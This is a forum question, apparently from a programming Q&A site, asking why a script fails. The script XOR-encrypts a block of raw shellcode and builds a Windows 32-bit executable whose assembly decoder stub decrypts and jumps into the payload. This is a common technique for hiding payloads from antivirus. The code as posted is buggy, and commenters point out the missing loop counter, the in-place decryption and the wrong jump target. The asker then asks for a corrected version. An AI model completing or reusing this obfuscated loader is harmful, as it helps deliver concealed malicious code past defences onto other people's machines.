# Why the final Windows 32-bit executable not be working?

Tags: assembly, obfuscation, xor, shellcode, decoder

This Python code is a simple script that encrypts a shellcode using XOR with a secret key, creates a decoder stub in assembly language, assembles the decoder stub, and then compiles it into a Windows 32-bit executable.

- The script starts by defining a shellcode variable containing a block of bytes representing the actual shellcode to be encrypted.
- An Example XOR key (secret_key) is provided, which will be used to encrypt and decrypt the shellcode using XOR. XOR encryption works by applying a bitwise XOR operation between each byte of the shellcode and the corresponding byte of the secret key.
- The script then proceeds to encrypt the shellcode using XOR with the secret_key. This is achieved using a list comprehension and the enumerate() function to iterate through the bytes of the shellcode and XOR them with the corresponding byte of the secret key. The result is stored in the encrypted_shellcode variable.
- Next, the script creates an assembly language decoder_stub that will be responsible for decrypting and executing the encrypted shellcode. The decoder stub is written in NASM syntax. It starts by defining a section .text for executable code and a section .data for data storage.
- Inside the decoder_stub, the encrypted shellcode is stored in the .data section using the shellcode db directive. The encrypted shellcode bytes are provided in hexadecimal format.
- The decoder_stub then defines a label _start that will serve as the entry point of the decoder stub. It sets up the esi register to point to the beginning of the encrypted shellcode.
- The decoder itself is a loop that decrypts the shellcode by applying the reverse XOR operation with the same secret_key. It sequentially XORs each byte of the encrypted shellcode with the corresponding byte of the secret_key, and the result is the decrypted shellcode.
- After the decryption loop, the decoder_stub jumps to the decrypted shellcode using a trampoline technique. It calculates the address of the decrypted shellcode and jumps to it by setting EAX (the general-purpose register) to the address and then performing a jmp eax instruction.
- The shellcode_len is defined to be the length of the encrypted shellcode, which will be used for memory allocation in the sub esp, shellcode_len instruction.
- The assembly code and data are concatenated, and the resulting assembly code is written to a new file named "decrypt32.asm".
- The script then assembles the "decrypt32.asm" file using NASM with the -fwin32 flag to generate a Windows 32-bit object file ("decrypt32.obj").
- Finally, the script compiles the "decrypt32.obj" file into a Windows 32-bit executable named "decrypt32.exe" using the i686-w64-mingw32-gcc compiler. The -nostartfiles flag is used to create an executable without any default startup files, and the -lkernel32 -luser32 -ladvapi32 -lshell32 flags are used to link the required system libraries.

```
1. 
if __name__ == "__main__": 
    
    shellcode =  b""
    shellcode += b"\xba\x37\xab\x0e\xdf\xd9\xeb\xd9\x74\x24\xf4\x5e"
    shellcode += b"\x33\xc9\xb1\x1f\x31\x56\x15\x03\x56\x15\x83\xc6"
    shellcode += b"\x04\xe2\xc2\xc1\x04\x81\x1d\xcd\xee\xde\x0e\xb2"
    shellcode += b"\x43\x4b\xb2\x84\x02\x02\x53\x29\x4a\x83\xc8\xda"
    shellcode += b"\x34\xac\xee\x1b\xa3\xae\xee\xa9\x5d\x26\x0f\xa7"
    shellcode += b"\xc7\x60\x9f\x69\x5f\x18\xfe\xc9\x92\x9a\x85\x0e"
    shellcode += b"\x55\x82\xcb\xfa\x9b\xdc\x71\x02\xe4\x1c\x2d\x69"
    shellcode += b"\xe4\x76\xc8\xe4\x07\xb7\x1b\x3b\x47\x3d\x5b\xbd"
    shellcode += b"\xf5\xd5\x7c\x8c\x01\x93\x82\xe0\x0d\xe3\x0b\xe3"
    shellcode += b"\xcf\x08\x07\x25\x2c\xc2\xa7\xd8\x7e\x5b\x42\xe2"
    shellcode += b"\xf9\x4c\x17\x6a\x18\xf5\x15\x48\x6b\x05\x94\x11"
    shellcode += b"\x0e\xca\x5e\x10\xee\x2a\x26\x15\x10\xad\x56\xad"
    shellcode += b"\x11\xad\x56\xd1\xdc\x2d"
    
    
    # Example XOR key
    secret_key = b"\xAA\xBB\xCC"

    # Encrypt the shellcode using XOR with the secret key
    encrypted_shellcode = bytes(data_byte ^ secret_key[i % len(secret_key)] for i, data_byte in enumerate(shellcode))

    # Create a decoder stub for the XOR decryption
    decoder_stub = b'''
    section .text
    global _start
    
    _start:
        ; Setup esi to point to the encrypted shellcode
        lea esi, [shellcode]
    
        ; Create space for decrypted shellcode
        ; This will be executed
        sub esp, shellcode_len
    
    decoder:
        ; XOR decryption
        xor byte [esi], 0xAA
        inc esi
        xor byte [esi], 0xBB
        inc esi
        xor byte [esi], 0xCC
        loop decoder
    
        ; Jump to the decrypted shellcode
        lea eax, [esp + shellcode_len]
        jmp eax
    
    section .data
        shellcode db ''' + b",".join([bytes(f"0x{byte:02x}", "utf-8") for byte in encrypted_shellcode]) + b'''
        shellcode_len equ $ - shellcode

    '''

    # Save the concatenated assembly code to a new file
    with open("decrypt32.asm", "wb") as file:
        file.write(decoder_stub)

    
    os.system("nasm -fwin32 -o decrypt32.obj decrypt32.asm")
    
    os.system("i686-w64-mingw32-gcc -nostartfiles -o decrypt32.exe decrypt32.obj -lkernel32 -luser32 -ladvapi32 -lshell32")
```

expecting the shellcode to work

Comment: Use a debugger to see where it goes wrong. I would expect the first obstacle to be that your code is in a read only memory region.

Comment: Where do you set up the loop counter?

Comment: Also you decrypt in place, you don't copy it to the stack. Even if you did, you got the jump wrong because that's the end of the code. But stack likely isn't executable by default either.

Comment: any suggestions on how to correct it? if possible re-modification